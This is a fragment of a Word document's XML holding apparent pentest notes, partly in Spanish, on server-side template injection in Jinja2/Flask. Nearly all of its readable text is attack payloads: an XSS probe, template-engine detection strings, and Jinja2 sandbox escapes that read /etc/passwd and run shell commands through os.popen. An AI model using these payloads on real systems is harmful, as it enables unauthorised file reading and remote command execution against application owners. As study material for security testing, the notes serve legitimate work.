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fc2913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fc2913"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:highlight w:val="white"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSTI jinja2 flask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929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&lt;img src=x onerror="alert('xss')"&gt;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Pruebas para determinar tipo de ataque SSTI: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{{7*7}}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${7*7}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&lt;%= 7*7 %&gt;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${{7*7}}</w:t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#{7*7}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929"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr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{{"".__class__.__mro__[1].__subclasses__() }}</w:t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{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}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{{ get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read() }}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{{ get_flashed_messages.globals.builtins.open("/etc/passwd").read() }}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{{"".__class__.__mro__[1].__subclasses__()[186].__init__.__globals__["__builtins__"]["__import__"]("os").popen("ls *").read()}}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2929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